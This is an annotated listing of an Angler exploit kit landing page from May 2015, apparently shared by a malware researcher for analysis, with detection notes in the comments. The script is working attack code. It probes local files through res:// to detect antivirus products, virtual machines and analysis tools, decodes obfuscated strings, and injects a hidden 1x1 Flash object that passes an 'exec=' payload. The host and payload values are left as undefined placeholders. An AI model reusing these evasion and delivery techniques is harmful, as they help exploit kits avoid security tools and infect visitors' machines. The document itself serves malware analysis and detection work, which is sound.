Kafeine

Angler_Landing_2015-05-16

May 16th, 2015
  // Analyst note: page-level state for the fingerprinting stage of this landing page.
  // 'rXWbJsIp' starts as '1' and is cleared to '' by mrkA(); nothing in this listing reads it,
  // so its consumer is not visible here. `i_a` is declared but never referenced in the listing.
  1. window['rXWbJsIp'] = '1';
  2. var i_a = [];
  3.  
  // mrkA: marker callback for the "security product found" outcome.
  // Called by Check() when a probe made with index 1 loads, and directly by CheckAll() when a
  // Kaspersky ActiveX object can be instantiated. It raises 'OIIiUFlL' (which also makes later
  // index-1 probes in Check() return early), clears 'rXWbJsIp', and resets four
  // fvOWbauMcjL* flags to false.
  // NOTE(review): of these flags only fvOWbauMcjLf1 is read in this listing, and the top-level
  // code assigns it true again after holdC(500); the readers of the other flags are not shown.
  4. function mrkA() {
  5.     window['OIIiUFlL'] = true;
  6.     window['rXWbJsIp'] = '';
  7.     window.fvOWbauMcjLs = false;
  8.     window.fvOWbauMcjLs = false;
  9.     window.fvOWbauMcjLf1 = false;
  10.     window.fvOWbauMcjLf2 = false;
  11. }
  12.  
  // mrkV: marker callback for probes made with index 0 (the vm_s / vm_p lists in CheckAll(),
  // i.e. virtualization drivers and analysis tooling). It only raises 'RTFYSzh'; this listing
  // reads that flag solely in Check(), to skip further index-0 probes once one has matched.
  13. function mrkV() {
  14.     window['RTFYSzh'] = true;
  15. }
  16.  
  // Check: tests whether a local file exists by loading it as a script through IE's res://
  // scheme and treating a successful load as "file present".
  //   rpath - local file path to probe (driver or program file, built by the callers)
  //   rr    - 0 or 1; selects the flag name ac[rr] and the marker function ac[rr + 2]
  //           (0 -> 'RTFYSzh' / mrkV, 1 -> 'OIIiUFlL' / mrkA)
  // Returns nothing; the result is reported only through the marker callbacks.
  // Detection: page script that builds 'res://' + <local path> + '/#16/#1' is a usable content
  // signature for this sample, and res:// loads of local binaries from a web page are not
  // normal browsing behaviour.
  17. function Check(rpath, rr) {
  18.     var ac = ['RTFYSzh', 'OIIiUFlL', mrkV, mrkA];
          // Skip the probe when the flag for this category is already set.
  19.     if (window[ac[rr]]) return;
  20.     var el = document.createElement('script');
          // MSInputMethodContext is used here as a browser-version discriminator; when it is
          // absent the element gets a non-JavaScript language value.
          // NOTE(review): presumably so the loaded resource is never executed as script — confirm.
  21.     if (!window['MSInputMethodContext']) el['language'] = 'some';
  22.     el.onload = function() {
  23.         ac[rr + 2]();
  24.     };
          // '/#16/#1' selects resource type 16 (RT_VERSION, the version-info resource), id 1,
          // inside the target file.
  25.     el.src = 'res://' + rpath + '/#16/#1';
          // Second reporting path: readyState reaching 'complete' or 'loaded' also fires the marker.
  26.     el['onreadystatechange'] = function() {
  27.         var r = this['readyState'];
  28.         if (r == 'complete' || r == 'loaded') {
  29.             ac[rr + 2]();
  30.         }
  31.     };
  32.     document.body.appendChild(el);
  33. }
  34.  
  // Check_pf: probes one relative path under both "C:\Program Files\" and
  // "C:\Program Files (x86)\" by delegating to Check().
  //   f - path relative to the Program Files directory
  //   r - category index passed through to Check() (0 or 1)
  35. function Check_pf(f, r) {
  36.     Check("C:\\Program Files\\" + f, r);
  37.     Check("C:\\Program Files (x86)\\" + f, r);
  38. }
  39.  
  // CheckAll: environment fingerprinting stage, called once at top level before the Flash
  // object markup is written. Order of checks as shown:
  //   1. return unless the browser identifies as Internet Explorer ('MSIE' / 'Trident/');
  //   2. try to instantiate two Kaspersky virtual-keyboard ActiveX ProgIDs; success -> mrkA();
  //   3. return when document.all exists but window.XMLHttpRequest does not (legacy IE);
  //   4. probe driver and Program Files paths through Check() / Check_pf(), index 0 for
  //      virtualization and analysis tooling, index 1 for security products.
  // Takes no arguments and returns nothing; results surface only as window flags.
  // Detection: the ProgID prefix and the driver / file-name lists below can serve as content
  // signatures for this sample.
  40. function CheckAll() {
  41.     if (navigator.userAgent.indexOf('MSIE') == -1 && navigator.appVersion.indexOf('Trident/') == -1) {
  42.         return;
  43.     }
  44.     var kvx, x0 = 'Kaspersky.IeVirtualKeyboardPlugin.JavascriptApi.',
  45.         x1 = x0 + '1',
  46.         x2 = x0 + '4_5_0.1';
          // Successful instantiation of either ProgID is taken as proof the product is installed.
  47.     try {
  48.         kvx = new ActiveXObject(x1);
  49.     } catch (e) {
  50.         kvx = false;
  51.         try {
  52.             kvx = new ActiveXObject(x2);
  53.         } catch (e) {
  54.             kvx = false;
  55.         }
  56.     }
  57.     if (kvx) {
  58.         mrkA();
  59.         return;
  60.     }
  61.     if (document.all && !window.XMLHttpRequest) {
  62.         return;
  63.     }
          // Probe lists. vm_s / av_s are driver base names (".sys" is appended in the loops);
          // vm_p / av_p are paths relative to Program Files. The kp* fragments assemble the
          // Kaspersky install paths per product line and version.
          // Note that Fiddler2\Fiddler.exe is in the index-0 list while FiddlerCore.dll is in
          // the index-1 list, so the two Fiddler artifacts set different flags.
  64.     var path_sys32 = "\\Windows\\System32\\drivers\\",
  65.         kp0 = "Kaspersky Lab\\Kaspersky ",
  66.         kp_a = "Anti-Virus ",
  67.         kp_i = "Internet Security ",
  68.         kp_t = "Total Security ",
  69.         kp_p = "PURE",
  70.         kp_c = "CRYSTAL ",
  71.         kp1 = "\\shellex.dll",
  72.         kp2 = "\\mfc42.dll",
  73.         kp3 = "\\avzkrnl.dll",
  74.         vm_s = ["vm3dmp", "vmusbmouse", "vmmouse", "vmhgfs", "VBoxGuest", "VBoxMouse", "VBoxSF", "VBoxVideo", "prl_time"],
  75.         vm_p = ['Fiddler2\\Fiddler.exe', 'VMware\\VMware Tools\\TPAutoConnSvc.exe', 'Oracle\\VirtualBox Guest Additions\\uninst.exe', 'Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe'],
  76.         av_s = ["kl1", "tmactmon", "tmcomm", "tmevtmgr", "TMEBC32", "tmeext", "tmnciesc", "tmtdi", "mbam"],
  77.         av_p = ["Malwarebytes Anti-Exploit\\mbae.exe", "Malwarebytes Anti-Malware\\mbam.exe", "FiddlerCoreAPI\\FiddlerCore.dll", "Trend Micro\\Titanium\\TmConfig.dll", "Trend Micro\\Titanium\\TmSystemChecking.dll", kp0 + kp_a + '6.0 for Windows Workstations' + kp1, kp0 + kp_a + '6.0' + kp1, kp0 + kp_a + '7.0' + kp1, kp0 + kp_a + '2009' + kp2, kp0 + kp_a + '2010' + kp2, kp0 + kp_a + '2011' + kp3, kp0 + kp_a + '2012\\x86' + kp2, kp0 + kp_a + '2013\\x86' + kp2, kp0 + kp_a + '14.0.0\\x86' + kp2, kp0 + kp_a + '15.0.0\\x86' + kp2, kp0 + kp_a + '15.0.1\\x86' + kp2, kp0 + kp_a + '15.0.2\\x86' + kp2, kp0 + kp_i + '6.0' + kp1, kp0 + kp_i + '7.0' + kp1, kp0 + kp_i + '2009' + kp2, kp0 + kp_i + '2010' + kp2, kp0 + kp_i + '2011' + kp3, kp0 + kp_i + '2012\\x86' + kp2, kp0 + kp_i + '2013\\x86' + kp2, kp0 + kp_i + '14.0.0\\x86' + kp2, kp0 + kp_i + '15.0.0\\x86' + kp2, kp0 + kp_i + '15.0.1\\x86' + kp2, kp0 + kp_i + '15.0.2\\x86' + kp2, kp0 + kp_t + '14.0.0\\x86' + kp2, kp0 + kp_t + '15.0.0\\x86' + kp2, kp0 + kp_t + '15.0.1\\x86' + kp2, kp0 + kp_t + '15.0.2\\x86' + kp2, kp0 + kp_p + kp2, kp0 + kp_p + ' 2.0\\x86' + kp2, kp0 + kp_p + ' 3.0\\x86' + kp2, kp0 + kp_c + '3.0\\x86' + kp2];
          // Index 0 -> mrkV on a hit (virtualization drivers, then analysis/VM tooling files).
  78.     for (var i = 0; i < vm_s.length; i++) {
  79.         Check(path_sys32 + vm_s[i] + '.sys', 0);
  80.     }
  81.     for (var i = 0; i < vm_p.length; i++) {
  82.         Check_pf(vm_p[i], 0);
  83.     }
          // Index 1 -> mrkA on a hit (security-product drivers, then product files).
  84.     for (var i = 0; i < av_s.length; i++) {
  85.         Check(path_sys32 + av_s[i] + '.sys', 1);
  86.     }
  87.     for (var i = 0; i < av_p.length; i++) {
  88.         Check_pf(av_p[i], 1);
  89.     }
  90. }
  91.  
  // holdC: synchronous busy-wait. Spins on new Date() until at least `millis` milliseconds
  // have elapsed since entry, blocking the script thread for that time.
  //   millis - minimum delay in milliseconds
  // NOTE(review): presumably meant to give the res:// probes from CheckAll() time to
  // resolve; whether their callbacks can run during a synchronous spin is browser-dependent
  // and cannot be confirmed from this listing.
  92. function holdC(millis) {
  93.     var date = new Date();
  94.     var curDate = null;
  95.     do {
  96.         curDate = new Date();
  97.     } while (curDate - date < millis);
  98. }
  // Top-level driver: run the fingerprinting checks, spin for 500 ms, then set
  // fvOWbauMcjLf1 to true. The assignment is unconditional, so as shown it overrides any
  // earlier reset of that flag by mrkA().
  99. CheckAll();
  100. holdC(500);
  101. window.fvOWbauMcjLf1 = true;
  // Array.prototype.indexOf fallback for old IE script engines that lack it; the decoder
  // defined below relies on indexOf.
  102. if (!Array.prototype.indexOf) {
  103.     Array.prototype.indexOf = function(obj, start) {
  104.         for (var i = (start || 0), j = this.length; i < j; i++) {
  105.             if (this[i] === obj) {
  106.                 return i;
  107.             }
  108.         }
  109.         return -1;
  110.     };
  111. }
  // The method names 'push' and 'indexOf' are spliced into the decoder source from these
  // variables rather than written inline in the string.
  112. var p = 'push',
  113.     i = 'indexOf';
  // DmjslCQ(text): string decoder built with new Function. Reading the generated source:
  //   - derives a column order from the key: for each character of the sorted key, the index
  //     of its first occurrence in the unsorted key;
  //   - pads `text` with spaces to the next multiple of the key length (a full extra block
  //     when the length is already aligned);
  //   - reorders every key-length chunk by that column order and concatenates the chunks;
  //   - strips all whitespace from the result and returns it.
  // NOTE(review): `zEwVfv1zEwVfv3` appears as a bare identifier that is not defined anywhere
  // in this listing, so the function throws a ReferenceError as pasted. Presumably this is a
  // template placeholder or a redaction of the real key — confirm against a live capture.
  // Detection: new Function with a 'cryptKey' / 'sortArray' / 'keyArray' body is a
  // distinctive string set for this decoder.
  114. window["DmjslCQ"] = new Function('text', "var cryptKey = zEwVfv1zEwVfv3, rawArray = cryptKey.split(''), sortArray = cryptKey.split(''), keyArray=[];sortArray.sort(); var keySize = sortArray.length;for (var i=0; i<keySize; i++) {keyArray." + p + "(rawArray." + i + "(sortArray[i]));}var k = keySize - text.length % keySize;for(var l = 0; l<k;l++) {text += ' ';} var endStr = '', i,j,line,newLine;for (i = 0; i < text.length; i += keySize) {line = text.substr(i,keySize).split('');newLine = '';for (j = 0; j < keySize; j++){newLine += line[keyArray[j]];}endStr = endStr + newLine;}endStr=endStr.replace(/\\s/g,'');return endStr;");
  // Browser.Version(): returns the number following "MSIE" in navigator.appVersion, or 999
  // when that token is absent. Nothing in this listing calls it.
  // The regex literal naming malware.dontneedcoffee.com is tested against no argument inside
  // an empty try/catch and its result (`birks`) is never used, so it has no effect on the
  // return value.
  // NOTE(review): the purpose of that embedded string cannot be determined from this listing.
  115. var Browser = {
  116.     Version: function() {
  117.         try {
  118.             var birks = /malware.dontneedcoffee.com/.test();
  119.         } catch (e) {}
  120.         var version = 999;
  121.         if (navigator.appVersion.indexOf("MSIE") != -1) version = parseFloat(navigator.appVersion.split("MSIE")[1]);
  122.         return version;
  123.     }
  124. };
  // Delivery stage: builds markup for a 1x1 Flash object and writes it into the element with
  // id "T6Fe3dfg" via innerHTML. That element is not part of this listing.
  // The gate reads fvOWbauMcjLf1, which the top-level code set to true unconditionally just
  // before, so as shown this branch is always taken.
  // Analyst summary of the markup:
  //   - classid d27cdb6e-ae6d-11cf-96b8-444553540000 is the Flash Player ActiveX control; a
  //     nested <object type="application/x-shockwave-flash"> covers non-IE browsers;
  //   - the movie URL is 'http://' + decoded host + '/' + decoded path, and FlashVars carries
  //     a decoded 'exec=' value; all three come from DmjslCQ();
  //   - allowScriptAccess=always and width/height of 1 are set on both objects.
  // NOTE(review): zEwVfk1zEwVfk3, zEwVfh1zEwVfh3 and zEwVfn1zEwVfn3 are bare identifiers that
  // are not defined in this listing (presumably placeholders or redactions for the encoded
  // host, path and FlashVars data), so no network indicator can be recovered from this paste.
  // Detection: a 1x1 Flash object with allowScriptAccess=always and an 'exec=' FlashVars
  // parameter, injected through innerHTML, is a usable behavioural signature for this sample.
  125. if (window.fvOWbauMcjLf1) {
           // 'wri' + 'te' fragments are declared here but not used in the visible code.
  126.     var klfg1 = 'wri',
  127.         klfg2 = 'te';
  128.  
           // Decoded host for the movie URL.
  129.     function getKolaio() {
  130.         return DmjslCQ(zEwVfk1zEwVfk3);
  131.     }
  132.  
           // Decoded URL path; the parameter `a` is ignored.
  133.     function getTxl(a) {
  134.         return DmjslCQ(zEwVfh1zEwVfh3);
  135.     }
  136.  
           // Decoded value passed to the Flash file as FlashVars 'exec='; `a` is ignored.
  137.     function getData(a) {
  138.         return DmjslCQ(zEwVfn1zEwVfn3);
  139.     }
  140.     var mirtul = "1";
  141.     var txt = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="1" height="1" id="23kjsdf">';
  142.     txt = txt + '<param name="movie" value="http://' + getKolaio() + '/' + getTxl(mirtul) + '" />';
  143.     txt = txt + '<param name="play" value="true"/>';
  144.     txt = txt + '<param name=FlashVars value="exec=' + getData(mirtul) + '" />';
  145.     txt = txt + '<!--[if !IE]>-->';
  146.     txt = txt + '<object type="application/x-shockwave-flash" data="http://' + getKolaio() + '/' + getTxl(mirtul) + '" allowScriptAccess=always width="1" height="1">';
  147.     txt = txt + '<param name="movie" value="http://' + getKolaio() + '/' + getTxl(mirtul) + '" />';
  148.     txt = txt + '<param name="play" value="true"/>';
  149.     txt = txt + '<param name=FlashVars value="exec=' + getData(mirtul) + '" />';
  150.     txt = txt + '<!--<![endif]-->';
  151.     txt = txt + '<!--[if !IE]>--></object><!--<![endif]-->';
  152.     txt = txt + '</object>';
           // Empty try/catch: no statements of substance in this listing.
  153.     try {;
  154.     } catch (e) {}
  155.     document.getElementById("T6Fe3dfg").innerHTML = txt;
  156. }